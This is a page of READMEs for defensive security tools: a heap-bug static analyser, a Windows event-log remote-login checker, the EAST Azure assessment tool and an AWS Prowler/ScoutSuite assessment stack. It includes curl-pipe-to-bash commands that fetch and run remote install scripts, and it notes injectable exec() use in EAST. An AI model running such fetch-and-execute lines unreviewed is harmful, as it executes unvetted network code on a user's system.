https://antonio-cooler.gitbook.io/coolervoid-tavern/detecting-heap-memory-pitfalls


Features

  • C and C++ tokenizer
  • List of heap static routes for each source with taint points for analysis
  • Analyser to detect double free vulnerability
  • Analyser to detect use after free vulnerability
  • Analyser to detect memory leak

To test, read the samplers directory to understand the context, then run the following:

$ git clone https://github.com/CoolerVoid/heap_detective

$ cd heap_detective

$ make
// to run
$ bin/heap_detective samplers/
Note: don't run "$ cd bin; ./heap_detective";
the first argument is a directory for recursive analysis

Note: tested with GCC 9 and 11

The first command-line argument is a directory for recursive analysis. You can study bad practices in the "samplers" directory.

Future features

  • Analyser to detect off-by-one vulnerability
  • Analyser to detect wild pointer
  • Analyser to detect heap overflow vulnerability

Overview

Output example:




Collect action done

...::: Heap static route :::...
File path: samplers/example3.c
Func name: main
Var name: new
line: 10: array = new obj[100];
Sinks:
line: 10: array = new obj[100];
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example3.c
Func name: while
Var name: array
line: 27: array = malloc(1);
Sinks:
line: 27: array = malloc(1);
Taint: True
In Loop: false
line: 28: array=2;
Taint: false
In Loop: false
line: 30: array = malloc(3);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example5.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 11: free(ch_ptr);
Taint: True
In Loop: false
line: 12: free(ch_ptr);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example1.c
Func name: main
Var name: buf1R1
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
Sinks:
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
Taint: True
In Loop: false
line: 26: free(buf1R1);
Taint: True
In Loop: false
line: 30: if (buf1R1) {
Taint: false
In Loop: false
line: 31: free(buf1R1);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example2.c
Func name: main
Var name: ch_ptr
line: 7: ch_ptr=malloc(100);
Sinks:
line: 7: ch_ptr=malloc(100);
Taint: True
In Loop: false
line: 11: ch_ptr = 'A';
Taint: false
In Loop: True
line: 12: free(ch_ptr);
Taint: True
In Loop: True
line: 13: printf("%s\n", ch_pt r);
Taint: false
In Loop: True

...::: Heap static route :::...
File path: samplers/example4.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 13: ch_ptr = 'A';
Taint: false
In Loop: false
line: 14: free(ch_ptr);
Taint: True
In Loop: false
line: 15: printf("%s\n", ch_ptr);
Taint: false
In Loop: false

...::: Heap static route :::...
File path: samplers/example6.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 11: free(ch_ptr);
Taint: True
In Loop: false
line: 13: ch_ptr = malloc(500);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example7.c
Func name: special
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 15: free(ch_ptr);
Taint: True
In Loop: false
line: 16: ch_ptr = malloc(500);
Taint: True
In Loop: false
line: 17: ch_ptr=NULL;
Taint: false
In Loop: false
line: 25: char *ch_ptr = NULL;
Taint: false
In Loop: false

...::: Heap static route :::...
File path: samplers/example7.c
Func name: main
Var name: ch_ptr
line: 27: ch_ptr = malloc(100);
Sinks:
line: 27: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 30: free(ch_ptr);
Taint: True
In Loop: false
line: 32: ch_ptr = malloc(500);
Taint: True
In Loop: false

>>-----> Memory leak analyser

...::: Memory leak analyser :::...
File path: samplers/example3.c
Function name: main
memory leak found!
line: 10: array = new obj[100];

...::: Memory leak analyser :::...
File path: samplers/example3.c
Function name: while
memory leak found!
line: 27: array = malloc(1);
line: 28: array=2;
line: 30: array = malloc(3);

...::: Memory leak analyser :::...
File path: samplers/example5.c
Function name: main
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Memory leak analyser :::...
File path: samplers/example1.c
Function name: main
memory leak found!
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Memory leak analyser :::...
File path: samplers/example2.c
Function name: main
memory leak found!
Maybe the function to liberate memory can be in a loop context!
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

...::: Memory leak analyser :::...
File path: samplers/example6.c
Function name: main
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 13: ch_ptr = malloc(500);

...::: Memory leak analyser :::...
File path: samplers/example7.c
Function name: special
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 15: free(ch_ptr);
line: 16: ch_ptr = malloc(500);
line: 17: ch_ptr=NULL;
line: 25: char *ch_ptr = NULL;

...::: Memory leak analyser :::...
File path: samplers/example7.c
Function name: main
memory leak found!
line: 27: ch_ptr = malloc(100);
line: 30: free(ch_ptr);
line: 32: ch_ptr = malloc(500);

>>-----> Start double free analyser

...::: Double free analyser :::...
File path: samplers/example5.c
Function name: main
Double free found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Double free analyser :::...
File path: samplers/example1.c
Function name: main
Double free found!
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Double free analyser :::...
File path: samplers/example2.c
Function name: main
Double free found!
Maybe the function to liberate memory can be in a loop context!
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

>>-----> Start use after free analyser

...::: Use after free analyser :::...
File path: samplers/example5.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example1.c
Function name: main
Use after free found
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Use after free analyser :::...
File path: samplers/example2.c
Function name: main
Use after free found
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example4.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 13: ch_ptr = 'A';
line: 14: free(ch_ptr);
line: 15: printf("%s\n", ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example6.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 13: ch_ptr = malloc(500);

...::: Use after free analyser :::...
File path: samplers/example7.c
Function name: special
Use after free found
line: 8: ch_ptr = malloc(100);
line: 15: free(ch_ptr);
line: 16: ch_ptr = malloc(500);
line: 17: ch_ptr=NULL;
line: 25: char *ch_ptr = NULL;

...::: Use after free analyser :::...
File path: samplers/example7.c
Function name: main
Use after free found
line: 27: ch_ptr = malloc(100);
line: 30: free(ch_ptr);
line: 32: ch_ptr = malloc(500);






Winevt_Logs_Analysis - Searching .Evtx Logs For Remote Connections


A simple script for finding remote connections to a Windows machine, and ideally some public IPs. It checks for certain EventIDs regarding remote logins and sessions.

You should run pip install -r requirements.txt so the script can work and parse the .evtx files inside the winevt folder.


The winevt/Logs folders and the script must be located under the same path.
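
For context, here is a minimal Python sketch of this kind of check using the python-evtx library; the EventID set below (4624/4625 logon events) and the file path are illustrative assumptions, not necessarily the script's exact logic:

import re
from Evtx.Evtx import Evtx  # pip install python-evtx

REMOTE_LOGON_IDS = {"4624", "4625"}  # assumed: logon success/failure EventIDs

def remote_logons(path: str) -> None:
    with Evtx(path) as log:
        for record in log.records():
            xml = record.xml()
            event_id = re.search(r"<EventID[^>]*>(\d+)</EventID>", xml)
            if event_id and event_id.group(1) in REMOTE_LOGON_IDS:
                ip = re.search(r'<Data Name="IpAddress">([^<]+)</Data>', xml)
                if ip and ip.group(1) not in ("-", "127.0.0.1", "::1"):
                    print(event_id.group(1), ip.group(1))

remote_logons("winevt/Logs/Security.evtx")  # illustrative path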

Execution Example

Result Example



EAST - Extensible Azure Security Tool - Documentation


Extensible Azure Security Tool (later referred to as EAST) is a tool for assessing Azure, and to some extent Azure AD, security controls. The primary use case of EAST is security data collection for evaluation in Azure assessments. This information (JSON content) can then be used in various reporting tools, which we use to further correlate and investigate the data.


This tool is licensed under MIT license.




Collaborators

Release notes

  • Preview branch introduced

    Changes:

    • Installation now accounts for the use of Azure Cloud Shell's updated version with regard to dependencies (Cloud Shell now has Node.js v16 installed)

    • Checking of Databricks cluster types as per advisory

      • Audits Databricks clusters for potential privilege elevation - this control typically requires permissions on the Databricks cluster
    • Content.json now has key- and content-based sorting. This enables delta checks with git diff HEAD^1 ¹, as content.json has a predetermined order of results

    ¹ A word of caution: if you want to check deltas of content.json, then content.json will need to be "unignored" from .gitignore, exposing results to any upstream you might have configured.

    Use this feature with caution, and ensure you don't have a public upstream set for the branch you are using this feature on

  • Change of programming patterns to avoid possible race conditions with larger datasets. This mostly means using let instead of var in for await -style loops


Important

Current status of the tool is beta
  • Fixes, updates etc. are done on a "best effort" basis, with no guarantee of the time, or quality, of the possible fix applied
  • We do some additional tuning before using EAST in our daily work, such as applying various run and environment restrictions, besides familiarizing ourselves with the environment in question. Thus we currently recommend that EAST is run only in test environments, and with read-only permissions.
    • All the calls in the service are largely to Azure Cloud IPs, so it should work well in hardened environments where outbound IP restrictions are applied. This reduces the risk of this tool containing malicious packages which could "phone home" without also having C2 in Azure.
      • Essentially, running it in read-only mode reduces a lot of the risk associated with possibly compromised NPM packages (Google "compromised NPM")
      • Bugs etc.: you can protect your environment against certain mistakes in this code by running the tool with reader-only permissions
  • A lot of the code is "AS IS": meaning it has only served the purpose of producing a certain result; a lot of cleaning up and modularizing remains to be finished
  • There are no tests at the moment, apart from certain manual checks that are run after changes to main.js and various more advanced controls.
  • The control descriptions at this stage are not the final product, so giving feedback on them, while appreciated, is not the focus of the tooling at this stage
  • As the name implies, we use it as a tool to evaluate environments. It is not meant to be run unmonitored for the time being, and should not be run in any internet-exposed service that accepts incoming connections.
  • Documentation could be described as incomplete for the time being
  • EAST is mostly focused on PaaS resources, as most of our Azure assessments focus on this resource type
  • No input sanitization is performed on launch params, as it is always assumed that the input of these parameters is controlled. That being said, the tool uses exec() extensively - while I have not reviewed all paths, I believe that achieving shellcode execution is trivial. This tool does not assume hostile input, thus the recommendation is that you don't paste launch arguments into the command line without reviewing them first.

Tool operation

Dependencies

To reduce the amount of code, the following dependencies are used for operation and aesthetics (kudos to the maintainers of these fantastic packages):

Package | License
axios | MIT
yargs | MIT
jsonwebtoken | MIT
chalk | MIT
js-beautify | MIT

Other dependencies for running the tool (if you are planning to run this in Azure Cloud Shell, you don't need to install Azure CLI):

  • This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)

Azure Cloud Shell (BASH) or applicable Linux Distro / WSL

  • AZ CLI (AZCLI USE): curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
  • Node.js runtime 14 (Node.js runtime for EAST): install with NVM

Controls

EAST provides three categories of controls: Basic, Advanced, and Composite

The machine-readable control looks like this, regardless of the type (Basic/Advanced/Composite):

{
  "name": "fn-sql-2079",
  "resource": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourcegroups/rg-fn-2079/providers/microsoft.web/sites/fn-sql-2079",
  "controlId": "managedIdentity",
  "isHealthy": true,
  "id": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourcegroups/rg-fn-2079/providers/microsoft.web/sites/fn-sql-2079",
  "Description": "\r\n Ensure The Service calls downstream resources with managed identity",
  "metadata": {
    "principalId": {
      "type": "SystemAssigned",
      "tenantId": "033794f5-7c9d-4e98-923d-7b49114b7ac3",
      "principalId": "cb073f1e-03bc-440e-874d-5ed3ce6df7f8"
    },
    "roles": [{
      "role": [{
        "properties": {
          "roleDefinitionId": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c",
          "principalId": "cb073f1e-03bc-440e-874d-5ed3ce6df7f8",
          "scope": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourceGroups/RG-FN-2079",
          "createdOn": "2021-12-27T06:03:09.7052113Z",
          "updatedOn": "2021-12-27T06:03:09.7052113Z",
          "createdBy": "4257db31-3f22-4c0f-bd57-26cbbd4f5851",
          "updatedBy": "4257db31-3f22-4c0f-bd57-26cbbd4f5851"
        },
        "id": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourceGroups/RG-FN-2079/providers/Microsoft.Authorization/roleAssignments/ada69f21-790e-4386-9f47-c9b8a8c15674",
        "type": "Microsoft.Authorization/roleAssignments",
        "name": "ada69f21-790e-4386-9f47-c9b8a8c15674",
        "RoleName": "Contributor"
      }]
    }]
  },
  "category": "Access"
}

Basic

Basic controls include checks on the initial ARM object for simple "toggle on/off" boolean settings of the service in question.

Example: Azure Container Registry adminUser

acr_adminUser


Portal EAST

if (item.properties?.adminUserEnabled == false ){returnObject.isHealthy = true }

Advanced

Advanced controls include checks beyond the initial ARM object, often invoking new requests to get further information about the resource in scope and its relation to other services.

Example: Role Assignments

Besides checking the role assignments of the subscription, an additional check is performed via Azure AD Conditional Access reporting: that MFA is enforced and that privileged accounts are not protected only by passwords (SPNs with client secrets).

Example: Azure Data Factory

ADF_pipeLineRuns

Azure Data Factory pipeline mapping combines pipelines -> activities -> data targets, and then checks for secrets leaked into the logs via the run history of said activities.



Composite

Composite controls combine two or more control results from the pipeline in order to form one or more new controls. Using composites solves two use cases for EAST:

  1. You can't guarantee the order in which control results are returned by the pipeline
  2. You need to return more than one control result from a single check

Example: composite_resolve_alerts

  1. Get alerts from Microsoft Cloud Defender on subscription check
  2. Form new controls per resourceProvider for alerts

Reporting

EAST is not focused on providing automated report generation; it mostly produces JSON files with control and evaluation status. The idea is to use separate tooling to create reports, which is fairly trivial to automate via markdown creation scripts and tools such as Pandoc.

  • While the focus is not on reporting, this repo includes example automation for report creation with pandoc to ease reading of the results in a single-document format.

While this tool does not distribute pandoc, it can be used for creating the reports, thus the following citation is added: https://github.com/jgm/pandoc/blob/master/CITATION.cff

cff-version: 1.2.0
title: Pandoc
message: "If you use this software, please cite it as below."
type: software
url: "https://github.com/jgm/pandoc"
authors:
- given-names: John
family-names: MacFarlane
email: jgm@berkeley.edu
orcid: 'https://orcid.org/0000-0003-2557-9090'
- given-names: Albert
family-names: Krewinkel
email: tarleb+github@moltkeplatz.de
orcid: '0000-0002-9455-0796'
- given-names: Jesse
family-names: Rosenthal
email: jrosenthal@jhu.edu

Running EAST scan

This part is a guide on how to run this either in BASH on Linux, or in BASH on Azure Cloud Shell (obviously Cloud Shell is Linux too, but it does not require that you have your own Linux box).

⚠️If you are running the tool in Cloud Shell, you might need to reapply some of the installations again as Cloud Shell does not persist various session settings.

Fire and forget prerequisites on cloud shell

curl -o- https://raw.githubusercontent.com/jsa2/EAST/preview/sh/initForuse.sh | bash;

jump to next step

Detailed prerequisites (if you opted not to do the "fire and forget" version)

Prerequisites

git clone https://github.com/jsa2/EAST --branch preview
cd EAST;
npm install

Pandoc installation on cloud shell

# Get pandoc for reporting (first time only)
wget "https://github.com/jgm/pandoc/releases/download/2.17.1.1/pandoc-2.17.1.1-linux-amd64.tar.gz";
tar xvzf "pandoc-2.17.1.1-linux-amd64.tar.gz" --strip-components 1 -C ~

Installing pandoc on distros that support APT

# Get pandoc for reporting (first time only)
sudo apt install pandoc

Login Az CLI and run the scan

# Relogin is required to ensure token cache is placed on session on cloud shell

az account clear
az login

#
cd EAST
# replace the subid below with your subscription ID!
subId=6193053b-408b-44d0-b20f-4e29b9b67394
#
node ./plugins/main.js --batch=10 --nativescope=true --roleAssignments=true --helperTexts=true --checkAad=true --scanAuditLogs --composites --subInclude=$subId


Generate report

cd EAST; node templatehelpers/eastReports.js --doc

  • If you want to include all Azure Security Benchmark results in the report

cd EAST; node templatehelpers/eastReports.js --doc --asb

Export report from cloud shell

pandoc -s fullReport2.md -f markdown -t docx --reference-doc=pandoc-template.docx -o fullReport2.docx


Azure DevOps (experimental): there is an Azure DevOps control for dumping pipeline logs. You can specify the control run as in the following example:

node ./plugins/main.js --batch=10 --nativescope=true --roleAssignments=true --helperTexts=true --checkAad=true --scanAuditLogs --composites --subInclude=$subId --azdevops "organizationName"

Licensing

Community use

  • Share relevant controls across multiple environments as community effort

Company use

  • Companies have the possibility to develop company-specific controls which apply to their specific work. Companies can then control these implementations by deciding to share, or not share, them based on the operating principles of that company.

Non IPR components

  • Code logic and functions are under the MIT license. Since code logic and functions are already based on open-source components & vendor APIs, it does not make sense to restrict something that is already based on open source.

If you use this tool as part of your commercial effort, we only require that you follow the very relaxed terms of the MIT license.

Read license

Tool operation documentation

Principles

AZCLI USE

Existing tooling enhanced with Node.js runtime

Use the rich and maintained context of Microsoft Azure CLI login & commands with Node.js control flow, which supplies enhanced REST requests and maps results to a schema.

  • This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)

Speedup

View more details

✅Using the Node.js runtime as orchestrator utilises Node's asynchronous nature, allowing batching of requests. Batching of requests utilizes the full extent of Azure Resource Manager's incredible speed.

✅Compared to running requests one by one, the speedup can be up to 10x when Node executes a batch of requests instead of a single request at a time
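
As a language-neutral illustration of the batching idea (EAST itself implements this in Node.js; the fetch() stub and timings below are assumptions), consider this small Python asyncio sketch mirroring the --batch and --wait parameters:

import asyncio

# Illustration of batched async requests; EAST implements this pattern in
# Node.js. fetch() is a stand-in for a real HTTP call to Azure Resource Manager.
async def fetch(resource_id: str) -> str:
    await asyncio.sleep(0.1)               # simulated network latency
    return f"result for {resource_id}"

async def run_batched(resource_ids, batch=10, wait=1.5):
    results = []
    for i in range(0, len(resource_ids), batch):
        chunk = resource_ids[i:i + batch]
        # The whole chunk is in flight at once, instead of one request at a time.
        results += await asyncio.gather(*(fetch(r) for r in chunk))
        if i + batch < len(resource_ids):
            await asyncio.sleep(wait)      # throttle pause between batches
    return results

print(asyncio.run(run_batched([f"res-{n}" for n in range(25)])))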

Parameters reference

Example:

node ./plugins/main.js --batch=10 --nativescope --roleAssignments --helperTexts=true --checkAad --scanAuditLogs --composites --shuffle --clearTokens
Param | Description | Default if undefined
--nativescope | Currently mandatory parameter | no values
--shuffle | Can help with throttling. Shuffles the resource list to reduce the possibility of the resource provider throttling threshold being met | no values
--roleAssignments | Checks controls as per microsoft.authorization | no values
--includeRG | Checks controls with ResourceGroups as per microsoft.authorization | no values
--checkAad | Checks controls as per microsoft.azureactivedirectory | no values
--subInclude | Defines subscription scope | no default; requires subscription ID(s), if not defined will enumerate all subscriptions the user has access to
--namespace | Text filter which matches the full, or part of, the resource ID (example: /microsoft.storage/storageaccounts matches all storage accounts in the scope) | optional parameter
--notIncludes | Text filter which matches the full, or part of, the resource ID; matches are excluded (example: /microsoft.storage/storageaccounts excludes all storage accounts in the scope) | optional parameter
--batch | Size of batch interval between throttles | 5
--wait | Wait time between batch intervals | 1500
--scanAuditLogs | Optional parameter. When defined in hours, toggles Azure Activity Log scanning for weak authentication events (defined in: scanAuditLogs) | 24h
--composites | Read composite controls | no values
--clearTokens | Clears tokens in the session folder; use this if you get authorization errors or have just changed to another az login account (use az account clear if you want to clear the AZ CLI cache too) | no values
--tag | Filter all results in the end based on a single tag (--tag=svc=aksdev) | no values
--ignorePreCheck | Use this option when used with browser delegated tokens | no values
--helperTexts | Will append text descriptions from general to manual controls | no values
--reprocess | Will update results in existing content.json. Useful for incremental runs | no values

Parameters reference for example report:

node templatehelpers/eastReports.js --asb 
Param | Description | Default if undefined
--asb | Gets all ASB results available to users | no values
--policy | Gets all Policy results available to users | no values
--doc | Prints the pandoc string for export to the console | no values

(Highly experimental) Running in restricted environments where only browser use is available

Read here Running in restricted environments

Developing controls

The developer guide, including a control flow description, is here: dev-guide.md

Updates and examples

Auditing Microsoft.Web provider (Functions and web apps)

✅Check roles that are assigned to function managed identity in Azure AD and all Azure Subscriptions the audit account has access to
✅Relation mapping, check which keyVaults the function uses across all subs the audit account has access to
✅Check if Azure AD authentication is enabled
✅Check that generation of access tokens to the API requires assignment .appRoleAssignmentRequired
✅Audit bindings
  • Function or Azure AD Authentication enabled
  • Count and type of triggers

✅Check if SCM and FTP endpoints are secured


Azure RBAC baseline authorization

⚠️Detect principals in privileged subscriptions roles protected only by password-based single factor authentication.
  • Checks for users without MFA policies applied for set of conditions
  • Checks for ServicePrincipals protected only by password (as opposed to using a Certificate Credential, workload federation and/or a workload identity CA policy)

Maps to App Registration Best Practices

  • An unused credential on an application can result in a security breach. While it's convenient to use password secrets as a credential, we strongly recommend that you use x509 certificates as the only credential type for getting tokens for your application

✅State healthy - User result example

{ 
"subscriptionName": "EAST -msdn",
"friendlyName": "joosua@thx138.onmicrosoft.com",
"mfaResults": {
"oid": "138ac68f-d8a7-4000-8d41-c10ff26a9097",
"appliedPol": [{
"GrantConditions": "challengeWithMfa",
"policy": "baseline",
"oid": "138ac68f-d8a7-4000-8d41-c10ff26a9097"
}],
"checkType": "mfa"
},
"basicAuthResults": {
"oid": "138ac68f-d8a7-4000-8d41-c10aa26a9097",
"appliedPol": [{
"GrantConditions": "challengeWithMfa",
"policy": "baseline",
"oid": "138ac68f-d8a7-4000-8d41-c10aa26a9097"
}],
"checkType": "basicAuth"
},
}

⚠️State unHealthy - Application principal example

{ 
"subscriptionName": "EAST - HoneyPot",
"friendlyName": "thx138-kvref-6193053b-408b-44d0-b20f-4e29b9b67394",
"creds": {
"@odata.context": "https://graph.microsoft.com/beta/$metadata#servicePrincipals(id,displayName,appId,keyCredentials,passwordCredentials,servicePrincipalType)/$entity",
"id": "babec804-037d-4caf-946e-7a2b6de3a45f",
"displayName": "thx138-kvref-6193053b-408b-44d0-b20f-4e29b9b67394",
"appId": "5af1760e-89ff-46e4-a968-0ac36a7b7b69",
"servicePrincipalType": "Application",
"keyCredentials": [],
"passwordCredentials": [],
"OnlySingleFactor": [{
"customKeyIdentifier": null,
"endDateTime": "2023-10-20T06:54:59.2014093Z",
"keyId": "7df44f81-a52c-4fd6-b704-4b046771f85a",
"startDateTime": "2021-10-20T06:54:59.2014093Z",
"secretText": null,
"hint": nu ll,
"displayName": null
}],
"StrongSingleFactor": []
}
}

Contributing

The following methods work for contributing for the time being:

  1. Submit a pull request with code / documentation change
  2. Submit an issue
    • An issue can be:
    • ⚠️Problem (issue)
    • Feature request
    • ❔Question

Other

  1. By default EAST tries to work with the current dependencies - introducing new (direct) dependencies is not directly encouraged with EAST. If such a vital dependency is introduced, then review the licensing of that dependency, and update readme.md - dependencies
    • There is nothing to prevent you from creating your own fork of EAST with your own dependencies


Aws-Security-Assessment-Solution - An AWS Tool To Help You Create A Point In Time Assessment Of Your AWS Account Using Prowler And Scout As Well As Optional AWS Developed Ransomware Checks


Self-Service Security Assessment tool

Cybersecurity remains a very important topic and point of concern for many CIOs, CISOs, and their customers. To meet these important concerns, AWS has developed a primary set of services customers should use to aid in protecting their accounts. Amazon GuardDuty, AWS Security Hub, AWS Config, and AWS Well-Architected reviews help customers maintain a strong security posture over their AWS accounts. As more organizations deploy to the cloud, especially if they are doing so quickly, and they have not yet implemented the recommended AWS Services, there may be a need to conduct a rapid security assessment of the cloud environment.

With that in mind, we have worked to develop an inexpensive, easy to deploy, secure, and fast solution to provide our customers two (2) security assessment reports. These security assessments are from the open source projects “Prowler” and “ScoutSuite.” Each of these projects conducts an assessment based on AWS best practices and can help quickly identify any potential risk areas in a customer’s deployed environment. If you are interested in conducting these assessments on a continuous basis, AWS recommends enabling Security Hub’s Foundational Security Best Practices standard. If you are interested in integrating your Prowler assessment results with Security Hub, you can also do that from Prowler natively, following the instructions here.

In addition, we have developed custom modules that speak to customer concerns around threats and misconfigurations; currently this includes checks for ransomware-specific findings.


ARCHITECTURE OVERVIEW

Overview - Open Source project checks

The architecture we deploy is a very simple VPC with two (2) subnets, one (1) NAT Gateway, one (1) EC2 instance, and one (1) S3 Bucket. The EC2 instance uses Amazon Linux 2 (the latest published AMI), is patched on boot, pulls down the two projects (Prowler and ScoutSuite), runs the assessments, and then delivers the reports to the S3 Bucket. The EC2 instance does not deploy with any EC2 Key Pair, does not have any open ingress rules on its Security Group, and is placed in the Private Subnet so it does not have direct internet access. After completion of the assessment and the delivery of the reports the system can be terminated.

The deployment is accomplished through the use of CloudFormation. A single CloudFormation template is used to launch a few other templates (in a modular approach). No parameters (user input) are required, and the automated build-out of the environment will take, on average, less than 10 minutes to complete. These templates are provided for review in this GitHub repository.

Once the EC2 Instance has been created and begins the two assessments, it will take somewhere around 40 minutes to complete. At the end of the assessments, after the two reports are delivered to the S3 Bucket, the Instance will automatically shut down. You may at this time safely terminate the Instance.

How to deploy this tool

How do I read the reports?

Diagram

Here is a diagram of the architecture.

What will be created

  • A VPC

    • This will be a /26 for the VPC
    • This will include 2 subnets both in the same Availability Zone, one Public and one Private
    • This will include the required Route Tables and ACLs
  • An EIP

    • For use by the NAT Gateway
  • A NAT Gateway

    • This is required for the instance to download both Prowler and ScoutSuite as well as to make the API Calls
  • A Security Group

    • For the Instance
  • A single m5a.large instance with a 10 GB gp2 EBS volume

    • This is the instance in which Prowler and ScoutSuite will run
    • It will be in a Private Subnet
    • It will not have an EC2 Key Pair
    • It will not allow ingress traffic on the Security Group
  • An Instance Role

    • This Role is required so that Prowler and ScoutSuite can run the API calls from the EC2 Instance
  • An IAM Policy

    • Some IAM permissions are required for Prowler and ScoutSuite
      • Prowler info here
      • ScoutSuite info here
  • An S3 Bucket

    • This is the location where the reports will be delivered
    • It will take about 40 minutes for the reports to show up

Open source security Assessments

These security assessments are from the open source projects “Prowler” and “ScoutSuite.” Each of these projects conducts an assessment based on AWS best practices and can help quickly identify any potential risk areas in a customer’s deployed environment.

1. Prowler

The first assessment is from Prowler.

  • Prowler follows the guidelines of the CIS Amazon Web Services Foundations Benchmark (49 checks) and has 40 additional checks, including checks related to GDPR and HIPAA; in total Prowler offers over 160 checks.

2. ScoutSuite

The second assessment is from ScoutSuite

  • ScoutSuite has been around since 2012, originally as Scout, then Scout2, and now ScoutSuite. It provides a set of files that can be viewed in your browser and conducts a wide range of checks

Overview of optional modules

► Check for Common Security Mistakes module

When enabled, this module will deploy a lambda function that checks for common security mistakes highlighted in https://www.youtube.com/watch?v=tmuClE3nWlk.

What will be created

A Lambda function that will perform the checks (a minimal sketch of one such check follows the list). Some of the checks include:

  • GuardDuty set to alert on findings
  • GuardDuty enabled across all regions
  • Prevent accidental key deletion
  • Existence of a Multi-region CloudTrail
  • CloudTrail validation enabled
  • No local IAM users
  • Roles tuned for least privilege in last 90 days
  • Alerting for root account use
  • Alerting for local IAM user create/delete
  • Use of Managed Prefix Lists in Security Groups
  • Public S3 Buckets
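
As an illustration only, here is a minimal Python (boto3) sketch of the "GuardDuty enabled across all regions" style of check; it is an assumption of how such a check could look, not this module's actual Lambda code:

import boto3  # assumed available in the Lambda runtime

def guardduty_enabled_everywhere() -> bool:
    # Report regions where no GuardDuty detector exists (illustrative check).
    session = boto3.session.Session()
    healthy = True
    for region in session.get_available_regions("guardduty"):
        client = session.client("guardduty", region_name=region)
        try:
            if not client.list_detectors().get("DetectorIds"):
                print(f"GuardDuty has no detector in {region}")
                healthy = False
        except Exception as exc:  # e.g. region not enabled for the account
            print(f"skipping {region}: {exc}")
    return healthy

print(guardduty_enabled_everywhere())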

Ransomware modules

When enabled, this module will deploy separate functions that can help customers with evaluating their environment for ransomware infection and susceptibility to ransomware damage.

What will be created

  • AWS Core security services enabled
    • Checks for AWS security service enablement in all regions where applicable (GuardDuty, SecurityHub)
  • Data protection checks
    • Checks for EBS volumes with no snapshot
    • Checks for outdated OS running
    • Checks for S3 bucket replication JobStatus
    • Checks for EC2 instances that cannot be managed with SSM
    • Checks for stale IAM roles that have been granted S3 access but have not used it in the last 60 days
    • Checks for S3 deny public access enablement
    • Checks to see if DNSSEC is enabled for public hosted zones in Amazon Route 53
    • Checks to see if logging is enabled for services relevant to ransomware (i.e. CloudFront, Lambda, Route53 Query Logging, and Route 53 Resolver Logging).
    • Checks to see if Route 53 Resolver DNS Firewall is enabled across all relevant regions
    • Checks to see if there are any Access Keys that have not been used in last 90 days

► SolarWinds module

When enabled, this module will deploy separate functions that can help customers with evaluating their environment for SolarWinds vulnerability. The checks are based on CISA Alert AA20-352A from Appendix A & B.

Note: Prior to enablement of this module, please read the module documentation which reviews the steps that need to be completed prior to using this module.

Note: This module MUST be run separately as its own stack, select the S3 URL SelfServiceSecSolar.yml to deploy

What will be created

  • Athena query - AA20352A IP IOC
    • This Athena query will scan your VPC flow logs for IP addresses from the CISA AA20-352A.
  • SSM Automation document - SolorWindsAA20-352AAutomatedScanner
    • This is a systems manager automation document that will scan Windows EC2 instances for impacted .dll files from CISA AA20-352A.
  • Route53 DNS resolver query - AA20352A DNS IOC
    • This Athena query will scan your DNS logs for customers that have enabled DNS query logging

Frequently Asked Questions (FAQ)

  1. Is there a cost?
    • Yes. This should normally cost less than $1 for an hour of use.
  2. Is this a continuous monitoring and reporting tool?
